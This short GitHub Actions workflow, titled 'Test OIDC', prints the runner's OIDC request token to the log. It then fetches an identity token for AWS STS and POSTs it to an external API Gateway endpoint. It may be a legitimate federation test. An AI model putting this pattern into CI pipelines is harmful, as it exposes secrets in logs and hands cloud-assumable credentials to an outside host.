name: Test OIDC

on: [push]

permissions:
  id-token: write

jobs:
  test-oidc:
    runs-on: ubuntu-latest
    steps:
      - name: Print OIDC Environment Vars
        run: |
          echo "ACTIONS_ID_TOKEN_REQUEST_URL: $ACTIONS_ID_TOKEN_REQUEST_URL"
          echo "ACTIONS_ID_TOKEN_REQUEST_TOKEN: $ACTIONS_ID_TOKEN_REQUEST_TOKEN"

      - name: Get OIDC Token
        run: |
          token=$(curl -sS -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" \
          "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=sts.amazon.com")
          echo "$token" | cut -d. -f2 | base64 -d | jq .
          curl -X POST -H "Content-Type: application/json" \
          -H "Authorization: Bearer ${token}" \
          -d '{\"token\":\"$token\"}' \
          "https://2sc5lj0u1l.execute-api.us-east-1.amazonaws.com/prod/ident"

